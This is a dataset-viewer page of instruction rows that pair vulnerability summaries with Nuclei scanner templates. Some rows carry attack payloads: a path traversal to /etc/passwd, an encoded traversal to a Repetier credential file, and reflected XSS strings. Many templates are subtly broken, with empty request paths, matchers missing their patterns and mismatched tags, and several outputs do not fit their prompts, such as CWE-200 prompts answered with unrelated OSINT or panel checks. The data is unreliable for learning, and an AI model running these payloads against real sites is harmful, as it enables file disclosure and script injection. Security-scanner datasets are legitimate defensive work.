Dataset Viewer
Auto-converted to Parquet Duplicate
instruction
stringlengths
41
188
input
stringlengths
165
3.12k
output
stringlengths
256
2.26M
category
stringclasses
3 values
severity
stringclasses
5 values
id
stringlengths
5
54
Generate a Nuclei template for: OpenSearch Dashboard Panel - Detect
Title: OpenSearch Dashboard Panel - Detect Summary: OpenSearch Dashboard Panel - Detect. OpenSearch Dashboard is a visualization and management tool for OpenSearch. This template detects the presence of the OpenSearch Dashboard login panel, which is the default authentication interface for accessing the dashboard. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: opensearch-dashboard-panel info: name: OpenSearch Dashboard Panel - Detect author: ritikchaddha severity: info description: OpenSearch Dashboard is a visualization and management tool for OpenSearch. This template detects the presence of the OpenSearch Dashboard login panel, which is the default authentication interface for accessing the dashboard. tags: opensearch,dashboard,login,panel,detect,discovery http: - method: GET path: - "{{BaseURL}}/app/login?" matchers: - type: word words: - "OpenSearch Dashboard" - "login" part: body condition: and
generic
info
opensearch-dashboard-panel
Generate a Nuclei template for CVE-2010-1056
Title: Path Traversal in rockettheme com_rokdownloads Summary: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. Vulnerability Type: Path Traversal Severity: medium Affected Products: rockettheme com_rokdownloads Indicators: error, vulnerability detected
id: CVE-2010-1056 info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. tags: cve,cve2010,joomla,lfi,edb,rockettheme,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" matchers: - type: regex - type: status status: - 200
cve
medium
CVE-2010-1056
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: arcgis-rest-api info: name: ArcGIS Exposed REST API documentation author: Podalirius severity: info description: ArcGIS REST API documentation was discovered. tags: api,arcgis,cms,tech,esri,discovery http: - method: GET path: - "{{BaseURL}}/server/sdk/rest/index.html" matchers: - type: word words: - "ArcGIS REST API" - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: gargoyle-router info: name: Gargoyle Router Management Utility Admin Login Panel - Detect author: DhiyaneshDk severity: info description: Gargoyle Router Management Utility admin login panel was detected. tags: panel,iot,gargoyle,router,edb,discovery http: - method: GET path: - "{{BaseURL}}/login.sh" matchers: - type: word words: - "<title>Gargoyle Router Management Utility</title>" - type: word words: - "text/html" part: header - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2020-12478
Title: Vulnerability (CWE-306) in teampass teampass Summary: TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files. Vulnerability Type: Vulnerability (CWE-306) Severity: high Affected Products: teampass teampass Indicators: error, vulnerability detected
id: CVE-2020-12478 info: name: TeamPass 2.1.27.36 - Improper Authentication author: arafatansari severity: high description: TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. tags: cve2020,cve,teampass,exposure,unauth,vuln http: - method: GET path: - "{{BaseURL}}/files/ldap.debug.txt" matchers: - type: word words: - "Get all LDAP params" part: body - type: word words: - "text/plain" part: header - type: status status: - 200
cve
high
CVE-2020-12478
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: bitchute info: name: Bitchute User Name Information - Detect author: dwisiswant0 severity: info description: Bitchute user name information check was conducted. tags: osint,osint-political,bitchute,discovery http: - method: GET path: - "https://www.bitchute.com/channel/{{user}}/" matchers: - type: status status: - 200 - type: word words: - "subscribers" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: Ash - Privilege Escalation
Title: Ash - Privilege Escalation Summary: Ash - Privilege Escalation. Ash allows the value of a variable to be set at the same time it is marked read only by writing readonly name=value With no arguments Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: privesc-ash info: name: Ash - Privilege Escalation author: daffainfo severity: high description: Ash allows the value of a variable to be set at the same time it is marked read only by writing readonly name=value With no arguments tags: code,linux,ash,privesc,local http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
privesc-ash
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: anaqua-login-panel info: name: Anaqua Login - Panel author: Ep1cSage severity: info description: Checks for the presence of Anaqua login page tags: anaqua,login,panel,discovery http: - method: GET path: - "{{BaseURL}}/anaqua/Public/Login.aspx?ReturnUrl=%2fanaqua%2f" matchers: - type: word words: - "Anaqua User Sign On" - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2025-8943
Title: Vulnerability (CWE-306) in flowiseai flowise Summary: The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands. Vulnerability Type: Vulnerability (CWE-306) Severity: critical Affected Products: flowiseai flowise Indicators: error, vulnerability detected
id: CVE-2025-8943 info: name: Flowise < 3.0.1 - Remote Command Execution author: zezezez severity: critical description: The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands. tags: cve,cve2025,rce,flowise,oast,fictional http: - method: GET path: matchers: - type: dsl condition: and
cve
critical
CVE-2025-8943
Generate a Nuclei template for CVE-2023-31059
Title: Path Traversal in repetier-server repetier-server Summary: Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. Vulnerability Type: Path Traversal Severity: high Affected Products: repetier-server repetier-server Indicators: error, vulnerability detected
id: CVE-2023-31059 info: name: Repetier Server - Directory Traversal author: parthmalhotra,pdresearch severity: high description: Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. tags: cve2023,cve,repetier,lfi,repetier-server,vkev,vuln http: - method: GET path: - "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php" matchers: - type: word part: body - type: status status: - 200
cve
high
CVE-2023-31059
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: fortiadc-panel info: name: FortiADC Login Panel - Detect author: DhiyaneshDk severity: info description: FortiADC login panel was detected. tags: panel,fortinet,discovery http: - method: GET path: - "{{BaseURL}}/ui/#navigate/Login" matchers: - type: word words: - "<title>FortiADC</title>" - type: word words: - "text/html" part: header - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2019-16932
Title: Vulnerability (CWE-918) in themeisle visualizer Summary: A blind SSRF vulnerability exists in the Visualizer plugin before 3.3.1 for WordPress via wp-json/visualizer/v1/upload-data. Vulnerability Type: Vulnerability (CWE-918) Severity: critical Affected Products: themeisle visualizer Indicators: error, vulnerability detected
id: CVE-2019-16932 info: name: Visualizer <3.3.1 - Blind Server-Side Request Forgery author: akincibor severity: critical description: Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss,vkev,vuln http: - method: GET path: matchers: - type: word words: - "Visualizer" - "Tested up to:" condition: and - method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" matchers: - type: word words: - "http" part: interactsh_protocol - type: word words: - "application/json" part: header - type: status status: - 200
cve
critical
CVE-2019-16932
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: ebay-stores info: name: Ebay stores User Name Information - Detect author: dwisiswant0 severity: info description: Ebay stores user name information check was conducted. tags: osint,osint-shopping,ebay-stores,discovery http: - method: GET path: - "https://www.ebay.com/str/{{user}}" matchers: - type: status status: - 200 - type: word words: - "| eBay Stores</title>" part: body
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2015-2807
Title: Cross-Site Scripting (XSS) in documentcloud navis_documentcloud Summary: Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: documentcloud navis_documentcloud Indicators: error, vulnerability detected
id: CVE-2015-2807 info: name: Navis DocumentCloud <0.1.1 - Cross-Site Scripting author: daffainfo severity: medium description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud,vuln http: - method: GET path: matchers: - type: word words: - "Navis" - "Tags:" condition: and - method: GET path: - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2015-2807
Generate a Nuclei template for: Content-Security-Policy Bypass - PBS URS
Title: Content-Security-Policy Bypass - PBS URS Summary: Content-Security-Policy Bypass - PBS URS. Tags: xss, csp-bypass, pbs-urs Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: pbs-urs-csp-bypass info: name: Content-Security-Policy Bypass - PBS URS author: renniepak,DhiyaneshDK severity: medium description: Content-Security-Policy Bypass - PBS URS tags: xss,csp-bypass,pbs-urs,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Content-Security-Policy" - "pbs.org" part: header condition: and
generic
medium
pbs-urs-csp-bypass
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: satis-repository info: name: Satis Composer Repository - Detect author: FlorianMaak severity: info description: Satis composer repository was detected tags: panel,exposure,composer,satis,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "This is a private repository" - "https://github.com/composer/satis" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2012-4242
Title: Cross-Site Scripting (XSS) in mf_gig_calendar_project mf_gig_calendar Summary: Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: mf_gig_calendar_project mf_gig_calendar Indicators: error, vulnerability detected
id: CVE-2012-4242 info: name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project,vuln http: - method: GET path: matchers: - type: word words: - "MF Gig Calendar =" - method: GET path: - "{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2012-4242
Generate a Nuclei template for: Confluent Access Token
Title: Confluent Access Token Summary: Confluent Access Token. Tags: file, keys, confluent Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: confluent-access-token info: name: Confluent Access Token author: DhiyaneshDK severity: info description: Confluent Access Token tags: file,keys,confluent,token http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
confluent-access-token
Generate a Nuclei template for: SSRF due to misconfiguration in OAuth
Title: SSRF due to misconfiguration in OAuth Summary: SSRF due to misconfiguration in OAuth. Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: ssrf-via-oauth-misconfig info: name: SSRF due to misconfiguration in OAuth author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. tags: misconfig,oast,oauth,ssrf,intrusive,vuln http: - method: GET path: matchers: - type: word words: - "dns" part: interactsh_protocol
generic
medium
ssrf-via-oauth-misconfig
Generate a Nuclei template for CVE-2025-5086
Title: Deserialization of Untrusted Data in 3ds delmia_apriso Summary: A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution. Vulnerability Type: Deserialization of Untrusted Data Severity: critical Affected Products: 3ds delmia_apriso Indicators: error, vulnerability detected
id: CVE-2025-5086 info: name: Dassault Systèmes DELMIA Apriso (up to 2025) - Insecure Deserialization author: hacktronai,iamnoooob,pdresearch severity: critical description: A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution. tags: cve,cve2024,delmia,apriso,serialization,rce,kev,vkev,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
critical
CVE-2025-5086
Generate a Nuclei template for CVE-2024-55591
Title: Vulnerability (CWE-288) in fortinet fortiproxy and others Summary: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module. Vulnerability Type: Vulnerability (CWE-288) Severity: critical Affected Products: fortinet fortiproxy, fortinet fortios Indicators: error, vulnerability detected
id: CVE-2024-55591 info: name: Fortinet Authentication Bypass author: rootxharsh,iamnoooob,pdresearch severity: critical description: Fortinet FortiOS is vulnerable to an information disclosure via service-worker.js that could allow an attacker to access sensitive information.This vulnerability affects FortiOS and could potentially lead to unauthorized access to the system. tags: cve,cve2024,fortinet,disclosure,fortios,kev,intrusive,vkev,vuln http: - method: GET path: matchers: - type: word words: - "api/v2/static" - "self.addEventListener" part: body condition: and - type: word words: - "application/javascript" part: content_type - type: status status: - 200
cve
critical
CVE-2024-55591
Generate a Nuclei template for: Widgets for Google Reviews Detection
Title: Widgets for Google Reviews Detection Summary: Widgets for Google Reviews Detection. Tags: tech, wordpress, wp-plugin Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-wp-reviews-plugin-for-google info: name: Widgets for Google Reviews Detection author: ricardomaia severity: info description: Widgets for Google Reviews Detection tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-wp-reviews-plugin-for-google
Generate a Nuclei template for: Angular JSON File Exposure
Title: Angular JSON File Exposure Summary: Angular JSON File Exposure. Tags: exposure, angularjs, files Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: angular-json info: name: Angular JSON File Exposure author: DhiyaneshDk severity: info description: Angular JSON File Exposure tags: exposure,angularjs,files,vuln http: - method: GET path: - "{{BaseURL}}/.angular-cli.json" - "{{BaseURL}}/angular-cli.json" - "{{BaseURL}}/angular.json" - "{{BaseURL}}/.angular.json" matchers: - type: word words: - ""root":" - ""config":" part: body condition: and - type: word words: - "application/json" part: header - type: status status: - 200
generic
info
angular-json
Generate a Nuclei template for: Operations Automation Default Page
Title: Operations Automation Default Page Summary: Operations Automation Default Page. Tags: tech, default, discovery Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: operations-automation-default-page info: name: Operations Automation Default Page author: dhiyaneshDK severity: info description: Operations Automation Default Page tags: tech,default,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Operations Automation Default Page</title>" - type: status status: - 200
generic
info
operations-automation-default-page
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: scalar-detection info: name: Scalar API Documentation - Detect author: recepgunes severity: info description: Scalar API documentation panel was detected. tags: panel,scalar,api,documentation,detect,discovery http: - method: GET path: - "{{BaseURL}}/scalar" - "{{BaseURL}}" matchers: - type: word words: - "Scalar API Reference" - "@scalar/api-reference" - "scalar-references" - "src="scalar.js" - "./scalar.aspnetcore.js" - "/scalar/v1" part: response condition: or - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for: Royal Elementor Addons and Templates Detection
Title: Royal Elementor Addons and Templates Detection Summary: Royal Elementor Addons and Templates Detection. Tags: tech, wordpress, wp-plugin Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-royal-elementor-addons info: name: Royal Elementor Addons and Templates Detection author: ricardomaia severity: info description: Royal Elementor Addons and Templates Detection tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/royal-elementor-addons/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-royal-elementor-addons
Generate a Nuclei template for CVE-2022-1574
Title: Cross-Site Request Forgery (CSRF) in html2wp_project html2wp Summary: The HTML2WP WordPress plugin through 1.0.0 does not have authorisation and CSRF checks when importing files, and does not validate them, as a result, unauthenticated attackers can upload arbitrary files (such as PHP) on the remote server Vulnerability Type: Cross-Site Request Forgery (CSRF) Severity: critical Affected Products: html2wp_project html2wp Indicators: error, vulnerability detected
id: CVE-2022-1574 info: name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload author: theamanrawat severity: critical description: WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server. tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
critical
CVE-2022-1574
Generate a Nuclei template for CVE-2024-13159
Title: Vulnerability (CWE-36) in ivanti endpoint_manager Summary: Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information. Vulnerability Type: Vulnerability (CWE-36) Severity: critical Affected Products: ivanti endpoint_manager Indicators: error, vulnerability detected
id: CVE-2024-13159 info: name: Ivanti EPM - Credential Coercion Vulnerability in GetHashForWildcardRecursive author: ritikchaddha severity: critical description: A vulnerability in Ivanti Endpoint Manager (EPM) allows an unauthenticated attacker to coerce the EPM machine account credential via the GetHashForWildcardRecursive endpoint. The vulnerability exists due to improper input validation in the wildcard parameter, allowing an attacker to specify a remote UNC path that triggers NTLM authentication. tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
critical
CVE-2024-13159
Generate a Nuclei template for: Balada Injector Malware - Detect
Title: Balada Injector Malware - Detect Summary: Balada Injector Malware - Detect. Checks websites for Balada Injector malware. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: balada-injector-malware info: name: Balada Injector Malware - Detect author: kazet severity: high description: Checks websites for Balada Injector malware. tags: malware,balada,misc,miscellaneous,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: regex part: body - type: word words: - "text/html" part: header
generic
high
balada-injector-malware
Generate a Nuclei template for CVE-2023-51409
Title: Unrestricted File Upload in meowapps ai_engine Summary: Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98. Vulnerability Type: Unrestricted File Upload Severity: critical Affected Products: meowapps ai_engine Indicators: error, vulnerability detected
id: CVE-2023-51409 info: name: Jordy Meow AI Engine - Unrestricted File Upload author: pussycat0x severity: critical description: Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine- ChatGPT Chatbot.This issue affects AI Engine- ChatGPT Chatbot- from n/a through 1.9.98. tags: cve,cve2023,wp,wordpress,wp-plugin,ai-engine,intrusive,vkev,vuln http: - method: GET path: matchers: - type: word words: - ""success":true" - "{{filename}}.php" part: body condition: and - type: word words: - "application/json" part: content_type - type: status status: - 200
cve
critical
CVE-2023-51409
Generate a Nuclei template for CVE-2022-3982
Title: Unknown Vulnerability in wpdevart booking_calendar Summary: The Booking calendar, Appointment Booking System WordPress plugin before 3.2.2 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE Vulnerability Type: Unknown Vulnerability Severity: critical Affected Products: wpdevart booking_calendar Indicators: error, vulnerability detected
id: CVE-2022-3982 info: name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload author: theamanrawat severity: critical description: WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart,vkev,vuln http: - method: GET path: matchers: - type: word words: - "{{md5(string)}}" part: body_3
cve
critical
CVE-2022-3982
Generate a Nuclei template for: Quivr Panel - Detect
Title: Quivr Panel - Detect Summary: Quivr Panel - Detect. Quivr panel was discovered. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: quivr-panel info: name: Quivr Panel - Detect author: s4e-io severity: info description: Quivr panel was discovered. tags: panel,login,quivr,detect,discovery http: - method: GET path: - "{{BaseURL}}/login" matchers: - type: dsl condition: and
generic
info
quivr-panel
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: icecast-mediaserver-detect info: name: Icecast Streaming Media Server Information Panel - Detect author: pussycat0x severity: info description: Icecast Streaming Media Server information panel was detected. tags: tech,icecast,media-server,detect,discovery http: - method: GET path: - "{{BaseURL}}/server_version.xsl" matchers: - type: word words: - "Icecast Streaming Media Server" part: body - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2022-31854
Title: Unrestricted File Upload in codologic codoforum Summary: Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel. Vulnerability Type: Unrestricted File Upload Severity: high Affected Products: codologic codoforum Indicators: error, vulnerability detected
id: CVE-2022-31854 info: name: Codoforum 5.1 - Arbitrary File Upload author: theamanrawat severity: high description: Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
high
CVE-2022-31854
Generate a Nuclei template for: Detect Gunicorn Server
Title: Detect Gunicorn Server Summary: Detect Gunicorn Server. Gunicorn Python WSGI HTTP Server for UNIX Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: gunicorn-detect info: name: Detect Gunicorn Server author: joanbono severity: info description: Gunicorn Python WSGI HTTP Server for UNIX tags: tech,gunicorn,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: regex part: header
generic
info
gunicorn-detect
Generate a Nuclei template for CVE-2021-41419
Title: Deserialization of Untrusted Data in qvis dvr_firmware and others Summary: QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization. Vulnerability Type: Deserialization of Untrusted Data Severity: critical Affected Products: qvis dvr_firmware, qvis nvr_firmware Indicators: error, vulnerability detected
id: CVE-2021-41419 info: name: QVIS NVR/DVR - Remote Code Execution author: me9187 severity: critical description: QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization. tags: cve,cve2021,qvisdvr,rce,deserialization,jsf,iot,oast http: - method: GET path: matchers: - type: word words: - "http" part: interactsh_protocol - type: status status: - 500
cve
critical
CVE-2021-41419
Generate a Nuclei template for: Application Insights Integration for Azure Function Apps
Title: Application Insights Integration for Azure Function Apps Summary: Application Insights Integration for Azure Function Apps. Ensure that the functions managed with Microsoft Azure Function App are configured to use Azure Monitor Application Insights. Application Insights is a robust APM solution designed to cater to the needs of both developers and DevOps experts. By enabling this service, you can effortlessly set up continuous monitoring for your serverless application. Application Insights excels at identifying performance irregularities and offers a suite of Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: azure-functionapp-appinsights-missing info: name: Application Insights Integration for Azure Function Apps author: princechaddha severity: high description: Ensure that the functions managed with Microsoft Azure Function App are configured to use Azure Monitor Application Insights. Application Insights is a robust APM solution designed to cater to the needs of both developers and DevOps experts. By enabling this service, you can effortlessly set up continuous monitoring for your serverless application. Application Insights excels at identifying performance irregularities and offers a suite of potent analytical tools to assist you in troubleshooting problems and gaining deep insights into user interactions with your application. tags: cloud,devops,azure,microsoft,application-insights,azure-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
azure-functionapp-appinsights-missing
Generate a Nuclei template for: RCDevs WebADM Panel - Detect
Title: RCDevs WebADM Panel - Detect Summary: RCDevs WebADM Panel - Detect. RCDevs WebADM Login Panel was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
